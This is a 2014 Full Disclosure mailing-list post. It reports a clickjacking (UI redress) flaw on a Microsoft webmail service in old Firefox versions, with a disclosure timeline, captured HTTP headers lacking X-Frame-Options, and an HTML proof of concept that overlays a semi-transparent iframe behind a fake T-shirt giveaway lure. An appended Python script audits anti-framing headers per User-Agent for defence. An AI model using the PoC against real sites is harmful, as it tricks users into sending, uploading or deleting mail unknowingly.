Date: Fri, 25 Apr 2014 18:11:03 +0530
From: Sandeep Kamble <>
To: full-disclosure <>,
Subject: [FD] UI redress attack on (affected all pages)

On 7/29/13 I reported an XFO vulnerability to the *Microsoft
Security team*; their investigation finally came to a conclusion and they fixed
the bug. So here are the details of the bug and the timeline of fixing it. A year ago,
on the weekend, I started digging into MS services for bugs.

The timeline of the investigation of the bug: July 29, 2013 - April 16, 2014.

[image: msresponse.jpg]

The interesting part of the vulnerability: all pages were protected against *UI
Redressing Attack*, and while testing, I normally test the application on
all browsers. The weird part comes here: I was able to iframe all
the pages of , including pre-authentication and post-authentication
pages, on Mozilla Firefox 3.6.28 to Mozilla Firefox 6. On Chrome and on
other browsers the XFO functionality worked perfectly on all pages.

Random announcement, nothing to do with this post: check out the recorded video
of the Garage4Hackers Ranchoddas Webcast Series - Browser Crash Analysis by
David Rude II aka Bannedit <>
Note: have a look at the same vulnerability on Facebook Application Installing

Obviously, you must be thinking why this is happening with Mozilla.
After doing some research and consulting with the *G4H team*, I've concluded
it may be an issue with the *Gecko Engine*. The test environment was Win 7,
Ubuntu 10, 11, 12.
Note: if you have stumbled upon the same issue with Gecko, then please
reply on this thread.

Check out the following headers; the XFO header is missing on Gecko/20120306
Firefox/3.6.28 to MF 6.


        GET /m/?bfv=wm HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20120306 Firefox/3.6.28
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip,deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Keep-Alive: 115
        Connection: keep-alive

        HTTP/1.1 200 OK
        Content-Type: text/html; charset=utf-8
        Content-Encoding: gzip
        Vary: Accept-Encoding
        Server: Microsoft-IIS/7.5
        X-Wlp-StartTime: 29-07-2013 10:10:32 AM
        xxn: 22
        MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20
        X-Powered-By: ASP.NET
        Content-Length: 3113
        Date: Mon, 29 Jul 2013 10:10:32 GMT
        Connection: keep-alive
        Set-Cookie: bfv=wm;; path=/
        Set-Cookie: widecontext=X; path=/; secure
        Set-Cookie:; path=/
        Set-Cookie: xidseq=7;; path=/
        Set-Cookie: LD=;; expires=Mon, 29-Jul-2013 08:30:32 GMT; path=/
        Cache-Control: no-cache, no-store, must-revalidate, no-transform
        Pragma: no-cache
        Expires: -1, -1

Here are some screenshots of basic operations on (I would like to
remind you, every page of was vulnerable).

The page the attacker developed to attack the victim:

*Composing Email : *

*Uploading Attachment : *

*Deleting Emails : *


HTML PoC, which I sent to the MS Security Team:


<!-- This quickly developed PoC, for testing purposes -->
<!-- Visit  -->
<html>
<head>
	<title> Live Mail Send Clickjacking - </title>
	<style>
		iframe {
		  position:absolute;          /* needed for top/left to take effect */
		  top:0; left:0;
		  filter:alpha(opacity=50);   /* in real life opacity=0 (legacy IE syntax) */
		  opacity:0.5;                /* same setting for Gecko/WebKit */
		}
	</style>
</head>
<body>
<div><center>Bhag Milkha Bhag Competition</center></div>
<center><b>Click Connect, You will get Bhag Milkha Bhag T-shirts. </b></center>

    <iframe src=""></iframe>
	<a href="" target="_blank" style="position: relative; left: 0px; top: 220px; z-index: -1;">Connect</a>
</body>
</html>


- [S]
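The defect described above is that the same page was protected by X-Frame-Options for some browsers and not for others, so a one-browser check would have missed it. The script below is an added example, not code from the original post or from Microsoft, for auditing exactly that: it parses raw HTTP response heads, works out the effective anti-framing policy (CSP frame-ancestors, else X-Frame-Options), and reports which User-Agents received no protection. The response blocks, the User-Agent strings and the absence of a real network fetch are all constructed for the example so that it runs offline; in a real audit you would replace SAMPLE_RESPONSES with captures taken for each User-Agent you care about.

```python
"""Audit whether a page's anti-framing policy depends on the User-Agent.

Added example (not part of the original post).  All responses below are
constructed to mirror the shape of the headers in the post: one capture
without X-Frame-Options, one with it, one relying on CSP instead.
"""
from typing import Dict, List, Optional, Tuple

# Constructed User-Agent strings used as keys for the sample captures.
GECKO_UA = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) Gecko/20120306 Firefox/3.6.28"
CHROME_UA = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 Chrome/28.0.1500.95 Safari/537.36"
FIREFOX22_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0"

# Constructed raw response heads, keyed by the User-Agent that elicited them.
SAMPLE_RESPONSES: Dict[str, str] = {
    GECKO_UA:
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        "Server: Microsoft-IIS/7.5\r\n"
        "X-Powered-By: ASP.NET\r\n"
        "Cache-Control: no-cache, no-store, must-revalidate, no-transform\r\n"
        "\r\n",
    CHROME_UA:
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        "X-Frame-Options: deny\r\n"
        "Server: Microsoft-IIS/7.5\r\n"
        "\r\n",
    FIREFOX22_UA:
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
        "\r\n",
}


def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """Split a raw HTTP/1.1 response head into (name, value) pairs.

    Header names are case-insensitive, so they are lower-cased; values keep
    their case because X-Frame-Options is compared case-insensitively later
    and CSP source expressions may be case-sensitive.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    if not lines or not lines[0].startswith("HTTP/"):
        raise ValueError("not an HTTP response head: %r" % lines[:1])
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        if not line.strip():
            continue
        name, sep, value = line.partition(":")
        if not sep:
            continue  # tolerate junk lines rather than abort the audit
        headers.append((name.strip().lower(), value.strip()))
    return headers


def framing_policy(headers: List[Tuple[str, str]]) -> Optional[str]:
    """Return the effective anti-framing policy, or None if any origin can frame the page.

    A CSP frame-ancestors directive takes precedence over X-Frame-Options in
    browsers that support both.  Unrecognised X-Frame-Options values are
    ignored by browsers, so they count as no protection.
    """
    for name, value in headers:
        if name != "content-security-policy":
            continue
        for directive in value.split(";"):
            parts = directive.strip().split()
            if parts and parts[0].lower() == "frame-ancestors":
                return "frame-ancestors " + " ".join(parts[1:])
    for name, value in headers:
        if name != "x-frame-options":
            continue
        upper = value.strip().upper()
        if upper in ("DENY", "SAMEORIGIN") or upper.startswith("ALLOW-FROM "):
            return "X-Frame-Options " + upper
        return None  # e.g. a typo such as "ALLOWALL" or "none"
    return None


def audit_by_user_agent(responses: Dict[str, str]) -> Dict[str, Optional[str]]:
    """Map each User-Agent to the policy its response carries (None = framable)."""
    return {ua: framing_policy(parse_headers(raw)) for ua, raw in responses.items()}


def unprotected_user_agents(responses: Dict[str, str]) -> List[str]:
    """User-Agents for which the page could be framed by any origin."""
    return [ua for ua, policy in audit_by_user_agent(responses).items() if policy is None]


def is_consistent(responses: Dict[str, str]) -> bool:
    """True only when every User-Agent receives some anti-framing policy."""
    return not unprotected_user_agents(responses)


if __name__ == "__main__":
    for ua, policy in audit_by_user_agent(SAMPLE_RESPONSES).items():
        print("%-90s %s" % (ua, policy or "NO FRAMING PROTECTION"))
    print("consistent across user agents:", is_consistent(SAMPLE_RESPONSES))
```

The point of keying the captures by User-Agent is that a single "the header is present" check gives false confidence; the report only passes when every client string receives a policy, which is the condition that would have caught the Gecko case in the post. Note that X-Frame-Options ALLOW-FROM is accepted here as a policy because Firefox honoured it, but Chrome never did, so a real audit should treat it as weaker than frame-ancestors.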

Sent through the Full Disclosure mailing list